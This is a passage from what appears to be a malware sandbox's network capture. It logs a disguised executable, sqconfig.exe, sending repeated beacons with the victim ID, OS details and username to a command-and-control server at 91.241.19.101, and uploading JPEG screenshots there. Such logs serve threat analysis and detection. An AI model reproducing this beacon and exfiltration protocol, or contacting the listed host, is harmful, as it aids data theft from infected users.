                                                                  Sep 30, 2021 23:53:06.285023928 CEST9826OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:06.285110950 CEST9829OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:06.405706882 CEST9840OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:06.405745983 CEST9842OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
                                                                  Sep 30, 2021 23:53:06.405922890 CEST9849OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:53:06.405937910 CEST9852OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:53:06.406147957 CEST9854OUTData Raw: df 3e 5c b8 f6 35 a1 8a 70 e3 bd 3f 69 35 b3 0f 67 07 ba 30 a5 f0 cc c3 94 60 d5 4e 4d 0e f2 31 fe a8 91 ed 5d 62 96 07 ad 4a 25 71 de ad 62 aa 2f 30 fa bc 1e cc e1 1e ca 78 fe f4 6c 3f 0a 8c a3 2f 63 5e 82 5d 58 7c f1 a9 fc 2a 36 b4 b2 9f ef c0
                                                                  Data Ascii: >\5p?i5g0`NM1]bJ%qb/0xl?/c^]X|*6ZktK7Y2z$l%Jifv#nS09*U**l:(VfgyQf*n=;WJZ+voWU%2#_;TPFye-'i"m RSWL'f
                                                                  Sep 30, 2021 23:53:06.529005051 CEST9857OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:06.529062986 CEST9863OUTData Raw: 18 9e 1f 3a 0f ed 1d 3d f5 28 22 32 cb a7 23 b9 9d 00 19 61 9d 9e 59 65 19 25 43 92 30 46 32 08 ac 40 72 b9 15 d8 58 7f 63 cb e2 bb bd 7e cb 5d b4 13 4a 67 ba b6 b0 b9 dd 04 a6 57 07 f7 6f 23 81 0a 80 58 fc db ce 40 e0 64 e0 73 b0 da 68 ea 63 8e
                                                                  Data Ascii: :=("2#aYe%C0F2@rXc~]JgWo#X@dshcMyWWah8>q8g%k)n\S`JS{E%(bQIA (`:6`QKHAKJZ`- 1EAE-RRQEZNQ@Mh$Z(SE-%
                                                                  Sep 30, 2021 23:53:06.717305899 CEST9904INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:06 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  53192.168.2.34984391.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:07.186939001 CEST9906OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:07.384913921 CEST9906INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:07 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  54192.168.2.34984491.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:07.437881947 CEST9907OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:07.437948942 CEST9907OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:07.438105106 CEST9917OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:07.438150883 CEST9920OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:07.566698074 CEST9924OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:07.566756010 CEST9939OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:07.566793919 CEST9946OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:53:07.693478107 CEST9953OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:07.693541050 CEST9955OUTData Raw: ef fb 90 fd 57 e6 79 ab 7c 06 d3 36 9d ba 80 2d 8e 01 85 c0 ff 00 d1 95 e5 1e 34 f0 4d ff 00 84 b5 16 8e 54 26 03 ca ba e4 8c 7a 83 dc 7f 93 5f 57 59 5d 25 f5 85 bd dc 60 84 9e 25 95 41 ea 03 00 7f ad 67 78 97 c3 f6 be 23 d2 25 b3 b8 45 2f 82 62
                                                                  Data Ascii: Wy|6-4MT&z_WY]%`%Agx#%E/br>c2=6nx*Kb$S[Gg\CjA ~H!QN*K*5eJ[h:g4U>6Z]3NVts0h,;qqY}h}i
                                                                  Sep 30, 2021 23:53:07.694025993 CEST9969OUTData Raw: ad 1e ca 7d 85 ed a1 dc a1 4e e2 af 0d 38 fa d2 8d 38 fa d5 7b 19 76 13 ad 0e e5 0a 2a ff 00 f6 71 f5 a5 fe ce 3e a2 8f 65 2e c1 ed a3 dc a1 4e ab c3 4e 3e b4 e1 a7 1f 5a af 63 2e c4 fb 68 77 33 e9 2b 48 69 a7 d6 97 fb 30 fa d1 ec 66 2f 6f 0e e6
                                                                  Data Ascii: }N88{v*q>e.NN>Zc.hw3+Hi0f/on)kQ4GZOUK>>E<VH_U{)3E_WSdZMav'44e/:zT/b)*V_YG^Ujjs8x@
                                                                  Sep 30, 2021 23:53:07.694178104 CEST9984OUTData Raw: a6 05 37 42 27 95 99 42 4f 13 26 8b 38 a4 35 45 af f1 d0 54 2d 7e e7 a5 76 f2 33 91 50 93 35 3e 5f 5a 43 24 63 a9 ac 66 ba 90 f7 a8 cc ae 7b d3 e4 34 58 77 d4 db 37 51 2f 61 51 b6 a2 ab d3 15 8d 92 7b d1 c9 a3 91 1a 2a 09 1a 6d aa 31 e9 50 3e a1
                                                                  Data Ascii: 7B'BO&85ET-~v3P5>_ZC$cf{4Xw7Q/aQ{*m1P>!TdTCURiUYZ(P0JQ@RR$Z1J\N@4v(-1Q@\j~f_j[pZh_U_KefqO;pkvxgQLAKIKLi(Ei;L.P)h!(
                                                                  Sep 30, 2021 23:53:07.897603989 CEST10002INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:07 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  55192.168.2.34984691.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:07.685806990 CEST9947OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:07.886998892 CEST10002INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:07 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  56192.168.2.34984891.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:08.129940033 CEST10017OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:08.377053976 CEST10058INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:08 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  57192.168.2.34985091.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:08.262321949 CEST10044OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:08.262438059 CEST10045OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:08.262717962 CEST10055OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:08.262851954 CEST10057OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:08.390734911 CEST10061OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:08.390778065 CEST10068OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:08.390789986 CEST10071OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
                                                                  Sep 30, 2021 23:53:08.390961885 CEST10078OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:53:08.391390085 CEST10083OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:53:08.520700932 CEST10091OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:08.520739079 CEST10093OUTData Raw: ef fb 90 fd 57 e6 79 ab 7c 06 d3 36 9d ba 80 2d 8e 01 85 c0 ff 00 d1 95 e5 1e 34 f0 4d ff 00 84 b5 16 8e 54 26 03 ca ba e4 8c 7a 83 dc 7f 93 5f 57 59 5d 25 f5 85 bd dc 60 84 9e 25 95 41 ea 03 00 7f ad 67 78 97 c3 f6 be 23 d2 25 b3 b8 45 2f 82 62
                                                                  Data Ascii: Wy|6-4MT&z_WY]%`%Agx#%E/br>c2=6nx*Kb$S[Gg\CjA ~H!QN*K*5eJ[h:g4U>6Z]3NVts0h,;qqY}h}i
                                                                  Sep 30, 2021 23:53:08.736285925 CEST10141INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:08 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  58192.168.2.34985291.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:08.614897966 CEST10133OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:08.817931890 CEST10141INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:08 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  59192.168.2.34985491.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:09.049403906 CEST10175OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:09.263796091 CEST10215INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:09 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  6192.168.2.34976591.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:50.727705002 CEST7187OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
